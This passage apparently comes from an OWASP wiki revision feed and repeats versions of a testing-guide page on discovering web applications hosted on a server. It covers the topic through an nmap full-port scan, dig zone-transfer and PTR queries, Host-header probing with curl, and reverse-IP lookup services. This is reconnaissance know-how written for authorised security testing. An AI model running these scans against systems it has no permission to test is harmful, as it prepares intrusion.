The same task may be performed by vulnerability scanners – but first check that your scanner of choice is able to identify http[s] services running on non-standard ports. For example, Nessus [3] is capable of identifying them on arbitrary ports (provided you instruct it to scan all the ports), and will provide – compared to nmap – a number of tests on known web server vulnerabilities, as well as on the SSL configuration of https services. As hinted before, Nessus is also able to spot popular applications / web interfaces which could otherwise go unnoticed (for example, a Tomcat administrative interface).&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 3 - virtual hosts'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There are a number of techniques which may be used to identify the DNS names associated with a given IP address ''x.y.z.t''.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS zone transfers&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This technique is of limited use nowadays, given that zone transfers are largely not honored by DNS servers, but it is worth a try. &amp;lt;br&amp;gt;&lt;br /&gt;
First of all, we must determine the name servers serving ''x.y.z.t''. If a symbolic name is known for ''x.y.z.t'' (let it be ''www.example.com''), its name servers can be determined by means of tools such as ''nslookup'' or ''dig'' by requesting DNS NS records.&amp;lt;br&amp;gt;&lt;br /&gt;
If no symbolic names are known for ''x.y.z.t'', but your target definition contains at least a symbolic name, you may try to apply the same process and query the name server of that name (hoping that ''x.y.z.t'' will be served as well by that name server). For example, if your target consists of the IP address ''x.y.z.t'' and of ''mail.example.com'', determine the name servers for domain ''example.com''.&amp;lt;br&amp;gt;&lt;br /&gt;
Then a zone transfer may be requested from the name servers for domain ''example.com''; if you are lucky, you will get back a list of the DNS entries for this domain. This will include the obvious ''www.example.com'' and the not-so-obvious ''helpdesk.example.com'' and ''webmail.example.com'' (and possibly others). Check all names returned by the zone transfer and consider all of those which are related to the target being evaluated.&lt;br /&gt;
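When a zone transfer succeeds (e.g. via dig's AXFR query type), the record list can be sifted programmatically for host names. A sketch, assuming the records come back in dig's usual zone-file layout (one record per line, the owner name in the first column); the sample names mirror the ''example.com'' hosts discussed above:

```python
def names_from_axfr(axfr_output, domain):
    """Collect the unique host names appearing in zone-transfer output
    in zone-file format.  Comment lines (starting with ';') and blank
    lines are skipped; only owners under 'domain' are kept."""
    names = set()
    for line in axfr_output.splitlines():
        line = line.strip()
        if not line or line.startswith(';'):
            continue  # skip dig's banner/comment lines and blanks
        owner = line.split()[0].rstrip('.')  # first column, drop root dot
        if owner.endswith(domain):
            names.add(owner)
    return sorted(names)
```

Every name returned this way is a candidate virtual host to check against the target IP.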
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS inverse queries&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This process is similar to the previous one, but relies on inverse (PTR) DNS records. Rather than requesting a zone transfer, try setting the record type to PTR and issue a query on the given IP address. If you are lucky, you may get back a DNS name entry. This technique relies on the existence of IP-to-symbolic-name maps, which is not guaranteed.&lt;br /&gt;
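Under the hood, a PTR query asks for a name built from the reversed IP octets under in-addr.arpa; the Python standard library can also perform the whole inverse lookup directly. A minimal sketch:

```python
import socket

def ptr_name(ip):
    """Build the in-addr.arpa name that a PTR query for 'ip' resolves:
    the octets are reversed and the in-addr.arpa suffix is appended."""
    return '.'.join(reversed(ip.split('.'))) + '.in-addr.arpa'

def reverse_lookup(ip):
    """Attempt an inverse query through the system resolver; returns
    the primary name, or None when no PTR record exists (which, as
    noted above, is not guaranteed)."""
    try:
        return socket.gethostbyaddr(ip)[0]
    except socket.herror:
        return None
```

For ''192.168.1.100'' the query name would be 100.1.168.192.in-addr.arpa; whether the lookup yields anything depends entirely on whether the address's owner maintains inverse records.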
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Web-based DNS searches&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This kind of search is akin to a DNS zone transfer, but relies on web-based services that allow name-based searches on DNS. One such service is the ''Netcraft Search DNS'' service, available at http://searchdns.netcraft.com/?host. You may query for a list of names belonging to your domain of choice, such as ''example.com'', and then check whether the names you obtained pertain to the target you are examining.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Reverse-IP services&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
Reverse-IP services are similar to DNS inverse queries, with the difference that you query a web-based application instead of a name server. There are a number of such services available. Since they tend to return partial (and often different) results, it is better to use multiple services to obtain a more comprehensive analysis.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
''Domain tools reverse IP'': http://www.domaintools.com/reverse-ip/ &amp;lt;br&amp;gt;&lt;br /&gt;
(requires free membership) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''MSN search'': http://search.msn.com &amp;lt;br&amp;gt;&lt;br /&gt;
syntax: &amp;quot;ip:x.x.x.x&amp;quot; (without the quotes) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''Webhosting info'': http://whois.webhosting.info/ &amp;lt;br&amp;gt; &lt;br /&gt;
syntax: http://whois.webhosting.info/x.x.x.x &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''DNSstuff'': http://www.dnsstuff.com/ &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple services available) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
http://net-square.com/msnpawn/index.shtml &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple queries on  domains and IP addresses, requires installation) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''tomDNS'': http://www.tomdns.net/ &amp;lt;br&amp;gt;&lt;br /&gt;
(some services are still private at the time of writing) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''SEOlogs.com'': http://www.seologs.com/ip-domains.html &amp;lt;br&amp;gt;&lt;br /&gt;
(reverse ip/domain lookup) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;Googling&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
After you have gathered as much information as you can with the previous techniques, you can rely on search engines to refine and extend your analysis. This may yield evidence of additional symbolic names belonging to your target, or of applications accessible via non-obvious URLs.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example == &lt;br /&gt;
'''Testing for Topic X vulnerabilities:'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Result Expected:'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
== References ==&lt;br /&gt;
[1] RFC 2616 – Hypertext Transfer Protocol – HTTP 1.1 &amp;lt;br&amp;gt;&lt;br /&gt;
[2] nmap, http://www.insecure.org &amp;lt;br&amp;gt;&lt;br /&gt;
[3] Nessus Vulnerability Scanner, http://www.nessus.org &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
DNS lookup tools such as ''nslookup'', ''dig'' or similar. &amp;lt;br&amp;gt;&lt;br /&gt;
Port scanners (such as nmap, http://www.insecure.org) and vulnerability scanners (such as Nessus: http://www.nessus.org; wikto: http://www.sensepost.com/research/wikto/). &amp;lt;br&amp;gt;&lt;br /&gt;
Search engines (Google, and other major engines). &amp;lt;br&amp;gt;&lt;br /&gt;
Specialized DNS-related web-based search service: see text.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Bregolin</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=11871</id>
		<title>Enumerate Applications on Webserver (OTG-INFO-004)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=11871"/>
				<updated>2006-11-06T13:13:08Z</updated>
		
		<summary type="html">&lt;p&gt;Bregolin: /* Black Box testing and example */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
A common step in testing for vulnerabilities in a web presence is to find out which particular applications are hosted on a web server.&amp;lt;br/&amp;gt;&lt;br /&gt;
Many different applications, in fact, have known vulnerabilities and known attack strategies that can be exploited in order to gain remote control or compromise data.&amp;lt;br&amp;gt;&lt;br /&gt;
In addition, many applications are often hosted on a particular web server without any reference from the main website: this is true for internal and/or extranet websites, which could be misconfigured or not updated due to the perception that they're used only &amp;quot;internally&amp;quot;.&amp;lt;br/&amp;gt;&lt;br /&gt;
Furthermore, many applications use common paths for administrative interfaces, which can be used to guess or brute-force administrative passwords.&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
With the proliferation of virtual web servers, the traditional 1:1-type relationship between an IP address and a web server is losing much of its original significance. It is not uncommon to have multiple web sites / applications whose symbolic names resolve &lt;br /&gt;
to the same IP address (and this scenario is not limited to hosting environments, but applies to ordinary corporate environments as well).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sometimes you, as a security professional, are given a set of IP addresses (or maybe just one) as a target to test, and no other knowledge. It is arguable that this setting is more akin to a pentest-type engagement, but in any case it is expected that such an assignment would test all web applications accessible through this target (and possibly other things). The problem is, the given IP address hosts an http service on port 80, but if you access it specifying the IP address (which is all you know) it reports &amp;quot;No web server configured at this address&amp;quot; or a similar message. But that system could &amp;quot;hide&amp;quot; a number of web applications, associated with unrelated symbolic (DNS) names. Obviously, the extent of your analysis is deeply affected by whether you test all of these applications, or miss some of them because you do not notice them.&lt;br /&gt;
Sometimes the target specification is richer – maybe you are handed a list of IP addresses and their corresponding symbolic names. Nevertheless, this list might convey partial information, i.e. it could omit some symbolic names – and the client might not even be aware of that! (This is more likely to happen in large organizations.)&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Other issues affecting the scope of the assessment are represented by web applications published at non-obvious URLs (e.g., http://www.example.com/some-strange-URL), which are not referenced elsewhere. This may happen either by error (due to misconfigurations), or intentionally (for example, unadvertised administrative interfaces).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
To address these issues it is necessary to perform web application discovery.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
'''Web application discovery''' &amp;lt;br&amp;gt;&lt;br /&gt;
Web application discovery is a process aimed at identifying web applications on a given infrastructure. The latter is usually specified as a set of IP addresses (maybe a net block), but may also consist of a set of DNS symbolic names, or a mix of the two.&amp;lt;br&amp;gt;&lt;br /&gt;
This information is provided prior to the execution of an assessment, be it a classic-style penetration test or an application-focused assessment. In both cases, unless the rules of engagement specify otherwise (e.g., “test only the application located at the URL http://www.example.com/”), the assessment should be as comprehensive in scope as possible, i.e. it should, first of all, identify all the applications accessible through the given target. In the following we will examine a few techniques that can be employed to achieve this goal. &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Note&amp;lt;/u&amp;gt;: Some of the following techniques apply to Internet-facing web servers, namely DNS and reverse-IP web-based search services and the use of search engines. Examples use private IP addresses (such as ''192.168.1.100'') which, unless indicated otherwise, represent ''generic'' IP addresses and are used only for anonymity purposes.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There are two factors influencing how many applications are related to a given DNS name (or an IP address).&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''1. Different base URL''' &amp;lt;br&amp;gt;&lt;br /&gt;
The obvious entry point for a web application is ''www.example.com'', i.e. with this shorthand notation we think of the web application originating at http://www.example.com/ (the same applies for https). However, though this is the most common situation, there is nothing forcing the application to start at “/”.&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the same symbolic name may be associated with three web applications such as &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url1 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url2 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url3 &amp;lt;br&amp;gt;&lt;br /&gt;
In this case the URL http://www.example.com/ would not be associated with a meaningful page, and the three applications would be “hidden” unless we explicitly know how to reach them, i.e. we know ''url1'', ''url2'' or ''url3''. There is usually no need to publish web applications in this way, unless you don’t want them to be accessible in a standard way and you are prepared to inform your users about their exact location. This doesn’t mean that these applications are secret, just that their existence and location are not explicitly advertised.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''2. Non-standard ports''' &amp;lt;br&amp;gt;&lt;br /&gt;
While web applications usually live on port 80 (http) and 443 (https), there is nothing magic about these port numbers. In fact, web applications may be associated with arbitrary TCP ports, and can be referenced by specifying the port number as follows: http[s]://www.example.com:port/. For example, http://www.example.com:20000/.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There is another factor affecting how many web applications are related to a given IP address.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''3. Virtual hosts''' &amp;lt;br&amp;gt;&lt;br /&gt;
DNS allows a single IP address to be associated with one or more symbolic names. For example, the IP address ''192.168.1.100'' might be associated with the DNS names ''www.example.com, helpdesk.example.com, webmail.example.com'' (it is not even necessary that all the names belong to the same DNS domain). This 1-to-N relationship may be used to serve different content through so-called virtual hosts. The information specifying the virtual host we are referring to is embedded in the HTTP 1.1 ''Host:'' header [1].&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
We would not suspect the existence of other web applications in addition to the obvious ''www.example.com'', unless we know of ''helpdesk.example.com'' and ''webmail.example.com''.&lt;br /&gt;
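As a quick illustrative probe (a sketch only: the IP address and host names below are the generic placeholders used in this section, not a real target), one can send the same request to the IP with different ''Host:'' headers and compare the responses:&lt;br /&gt;

```shell
# Probe one IP address with several candidate Host headers.
# If virtual hosts are configured, status codes or body sizes will differ.
for name in www.example.com helpdesk.example.com webmail.example.com; do
  printf '%-25s ' "$name"
  curl -s -o /dev/null -w '%{http_code} %{size_download}\n' \
       -H "Host: $name" http://192.168.1.100/
done
```

A host name that answers with a different status code or body size than the default site is worth investigating further.&lt;br /&gt;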
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 1 - non-standard URLs'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There is no foolproof way to ascertain the existence of non-standard-named web applications. Being non-standard, there is no magic recipe for finding them. However, a few criteria can aid the search.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
First, if the web server is misconfigured and allows directory browsing, it may be possible to spot these applications. Vulnerability scanners may help in this respect. &amp;lt;br&amp;gt;&lt;br /&gt;
Second, these applications might be referenced by other web pages; as such, there is a chance that they have been spidered and indexed by web search engines. If we suspect the existence of such “hidden” applications on ''www.example.com'' we could, for example, do a bit of googling using the ''site'' operator and examine the results of the query “site:www.example.com”. Among the returned URLs there could be one pointing to such a non-obvious application.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Another option is to probe for URLs which are likely candidates for non-published applications. For example, a web mail front end might be accessible from a URL such as https://www.example.com/webmail even though this URL is not referenced anywhere (after all, employees know where the webmail application is located, and there is no reason to reveal this information to outsiders by publishing it on the corporate web site). The same holds for administrative interfaces, which may be published at standard URLs (for example, a Tomcat administrative interface) and yet not be referenced anywhere. So, doing a bit of dictionary-style searching (or “intelligent guessing”) could yield some results. Vulnerability scanners may help in this respect.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 2 - non-standard ports'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
The existence of web applications on non-standard ports is easy to check. A port scanner such as nmap [2] can perform service recognition by means of the -sV option, and will identify http[s] services on arbitrary ports. What is required is a full scan of the whole 64k TCP port address space.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the following command will look up, with a TCP connect scan, all open ports on IP ''192.168.1.100'' and will try to determine what services are bound to them (only ''essential'' switches are shown – nmap features a broad set of options, whose discussion is out of scope).&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
''nmap -P0 -sT -sV -p1-65535 192.168.1.100''&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
It is sufficient to examine the output and look for http or an indication of SSL-wrapped services (which should be probed to confirm that they are https).&lt;br /&gt;
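A minimal way to do this filtering, shown here on a fabricated sample of ''nmap -sV'' output (the services listed are illustrative, not from a real scan), is:&lt;br /&gt;

```shell
# Fabricated sample of an nmap -sV service table (illustrative only).
nmap_output='22/tcp    open  ssh       OpenSSH 4.3
80/tcp    open  http      Apache httpd 2.2.3
443/tcp   open  ssl/http  Apache httpd 2.2.3
20000/tcp open  http      MiniServ 0.01'

# Keep only the lines whose service column suggests a web server,
# either plain http or an SSL-wrapped service.
printf '%s\n' "$nmap_output" | grep -E 'http|ssl'
```

This would single out ports 80, 443 and 20000 for further (manual) probing.&lt;br /&gt;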
&amp;lt;br&amp;gt;&lt;br /&gt;
The same task may be performed by vulnerability scanners – but first check that your scanner of choice is able to identify http[s] services running on non-standard ports. For example, Nessus [3] is capable of identifying them on arbitrary ports (provided you instruct it to scan all the ports), and will provide – in addition to what nmap offers – a number of tests on known web server vulnerabilities, as well as on the SSL configuration of https services. As hinted before, Nessus is also able to spot popular applications / web interfaces which could otherwise go unnoticed.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 3 - virtual hosts'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There are a number of techniques which may be used to identify the DNS names associated with a given IP address ''x.y.z.t''.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS zone transfers&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This technique is nowadays of limited use, given that zone transfers are largely not honored by DNS servers, but it is worth a try. &amp;lt;br&amp;gt;&lt;br /&gt;
First of all, we must determine the name servers serving ''x.y.z.t''. If a symbolic name is known for ''x.y.z.t'' (let it be ''www.example.com''), its name servers can be determined by means of tools such as ''nslookup'' or ''dig'' by requesting DNS NS records.&amp;lt;br&amp;gt;&lt;br /&gt;
If no symbolic names are known for ''x.y.z.t'', but your target definition contains at least a symbolic name, you may try to apply the same process and query the name server of that name (hoping that ''x.y.z.t'' will be served as well by that name server). For example, if your target consists of the IP address ''x.y.z.t'' and of ''mail.example.com'', determine the name servers for domain ''example.com''.&amp;lt;br&amp;gt;&lt;br /&gt;
Then a zone transfer may be requested from the name servers for domain ''example.com''; if you are lucky, you will get back a list of the DNS entries for this domain. This will include the obvious ''www.example.com'' and the not-so-obvious ''helpdesk.example.com'' and ''webmail.example.com'' (and possibly others). Check all names returned by the zone transfer and consider those which are related to the target being evaluated.  &lt;br /&gt;
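With ''dig'', the two steps above can be sketched as follows (''example.com'' and ''ns1.example.com'' are placeholders; as noted, most name servers will simply refuse the transfer):&lt;br /&gt;

```shell
# Step 1: determine the authoritative name servers for the domain.
dig ns example.com +short

# Step 2: request a zone transfer (AXFR) from one of the servers found.
# On hardened servers this typically ends with a refusal such as
# "Transfer failed."; if it succeeds, all DNS entries are listed.
dig axfr example.com @ns1.example.com
```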
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS inverse queries&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This process is similar to the previous one, but relies on inverse (PTR) DNS records. Rather than requesting a zone transfer, try setting the record type to PTR and issue a query on the given IP address. If you are lucky, you may get back a DNS name entry. This technique relies on the existence of IP-to-symbolic-name maps, which is not guaranteed.&lt;br /&gt;
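With ''dig'' this amounts to a single query (the address is the generic placeholder used throughout this section):&lt;br /&gt;

```shell
# Reverse (PTR) lookup: returns a symbolic name only if a map exists.
dig -x 192.168.1.100 +short
```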
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Web-based DNS searches&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This kind of search is akin to a DNS zone transfer, but relies on web-based services which allow name-based searches on DNS. One such service is the ''Netcraft Search DNS'' service, available at http://searchdns.netcraft.com/?host. You may query for a list of names belonging to your domain of choice, such as ''example.com'', and then check whether the names you obtain pertain to the target you are examining.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Reverse-IP services&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
Reverse-IP services are similar to DNS inverse queries, with the difference that you query a web-based application instead of a name server. There are a number of such services available. Since they tend to return partial (and often different) results, it is better to use multiple services to obtain a more comprehensive analysis.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
''Domain tools reverse IP'': http://www.domaintools.com/reverse-ip/ &amp;lt;br&amp;gt;&lt;br /&gt;
(requires free membership) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''MSN search'': http://search.msn.com &amp;lt;br&amp;gt;&lt;br /&gt;
syntax: &amp;quot;ip:x.x.x.x&amp;quot; (without the quotes) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''Webhosting info'': http://whois.webhosting.info/ &amp;lt;br&amp;gt; &lt;br /&gt;
syntax: http://whois.webhosting.info/x.x.x.x &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''DNSstuff'': http://www.dnsstuff.com/ &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple services available) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
http://net-square.com/msnpawn/index.shtml &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple queries on  domains and IP addresses, requires installation) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''tomDNS'': http://www.tomdns.net/ &amp;lt;br&amp;gt;&lt;br /&gt;
(some services are still private at the time of writing) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''SEOlogs.com'': http://www.seologs.com/ip-domains.html &amp;lt;br&amp;gt;&lt;br /&gt;
(reverse ip/domain lookup) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;Googling&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
After you have gathered as much information as you can with the previous techniques, you can rely on search engines to possibly refine and extend your analysis. This may yield evidence of additional symbolic names belonging to your target, or applications accessible via non-obvious URLs.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example == &lt;br /&gt;
'''Testing for Topic X vulnerabilities:'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Result Expected:'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
== References ==&lt;br /&gt;
[1] RFC 2616 – Hypertext Transfer Protocol – HTTP 1.1 &amp;lt;br&amp;gt;&lt;br /&gt;
[2] nmap, http://www.insecure.org &amp;lt;br&amp;gt;&lt;br /&gt;
[3] Nessus Vulnerability Scanner, http://www.nessus.org &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
DNS lookup tools such as ''nslookup'', ''dig'' or similar. &amp;lt;br&amp;gt;&lt;br /&gt;
Port scanners (such as nmap, http://www.insecure.org) and vulnerability scanners (such as Nessus: http://www.nessus.org; wikto: http://www.sensepost.com/research/wikto/). &amp;lt;br&amp;gt;&lt;br /&gt;
Search engines (Google, and other major engines). &amp;lt;br&amp;gt;&lt;br /&gt;
Specialized DNS-related web-based search service: see text.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Bregolin</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=11869</id>
		<title>Enumerate Applications on Webserver (OTG-INFO-004)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=11869"/>
				<updated>2006-11-06T13:08:29Z</updated>
		
		<summary type="html">&lt;p&gt;Bregolin: /* Black Box testing and example */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
A common step for testing vulnerabilities in a Web presence is to find out which particular applications are hosted on a Web Server.&amp;lt;br/&amp;gt;&lt;br /&gt;
Many different applications, in fact, have known vulnerabilities and known attack strategies that can be exploited in order to gain remote control or to compromise data.&amp;lt;br&amp;gt;&lt;br /&gt;
In addition, many applications are often hosted on a given web server without being referenced from the main website: this is true for internal and/or extranet websites, which may be misconfigured or not kept up to date due to the perception that they are used only &amp;quot;internally&amp;quot;.&amp;lt;br/&amp;gt;&lt;br /&gt;
Furthermore, many applications use common paths for administrative interfaces, which can be used to guess or brute-force administrative passwords.&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
With the proliferation of virtual web servers, the traditional 1:1-type relationship between an IP address and a web server is losing much of its original significance. It is not uncommon to have multiple web sites / applications whose symbolic names resolve &lt;br /&gt;
to the same IP address (and this scenario is not limited to hosting environments, but applies to ordinary corporate environments as well).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sometimes you, as a security professional, are given a set of IP addresses (or maybe just one) as a target to test, with no other knowledge. It is arguable that this setting is more akin to a pentest-type engagement, but in any case such an assignment would be expected to test all web applications accessible through this target (and possibly other things...). The problem is that the given IP address may host an http service on port 80 which, when accessed by IP address (which is all you know), reports &amp;quot;No web &lt;br /&gt;
server configured at this address&amp;quot; or a similar message. Yet that system could &amp;quot;hide&amp;quot; a number of web applications, associated with unrelated symbolic (DNS) names. Obviously, the extent of your analysis is deeply affected by whether you test all of these applications, only some of them, or none at all - because you do not notice them.&lt;br /&gt;
Sometimes the target specification is richer – maybe you are handed a list of IP addresses and their corresponding symbolic names. Nevertheless, this list might convey only partial information, i.e. it could omit some symbolic names – and the client might not even be aware of that! (This is more likely to happen in large organizations.)&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Other issues affecting the scope of the assessment are represented by web applications published at non-obvious URLs (e.g., http://www.example.com/some-strange-URL), which are not referenced elsewhere. This may happen either by error (due to misconfigurations), or intentionally (for example, unadvertised administrative interfaces).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
To address these issues it is necessary to perform web application discovery.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
'''Web application discovery''' &amp;lt;br&amp;gt;&lt;br /&gt;
Web application discovery is a process aimed at identifying web applications on a given infrastructure. The latter is usually specified as a set of IP addresses (maybe a net block), but may also consist of a set of DNS symbolic names, or a mix of the two.&amp;lt;br&amp;gt;&lt;br /&gt;
This information is provided prior to the execution of an assessment, be it a classic-style penetration test or an application-focused assessment. In both cases, unless the rules of engagement specify otherwise (e.g., “test only the application located at the URL http://www.example.com/”), the assessment should be as comprehensive in scope as possible, i.e. it should, first of all, identify all the applications accessible through the given target. In the following we will examine a few techniques that can be employed to achieve this goal. &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Note&amp;lt;/u&amp;gt; Some of the following techniques apply to Internet-facing web servers, namely DNS and reverse-IP web-based search services and the use of search engines.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There are two factors influencing how many applications are related to a given DNS name (or an IP address).&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''1. Different base URL''' &amp;lt;br&amp;gt;&lt;br /&gt;
The obvious entry point for a web application is ''www.example.com'', i.e. with this shorthand notation we think of the web application originating at http://www.example.com/ (the same applies for https). However, though this is the most common situation, there is nothing forcing the application to start at “/”.&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the same symbolic name may be associated with three web applications such as &amp;lt;br&amp;gt;&lt;br /&gt;
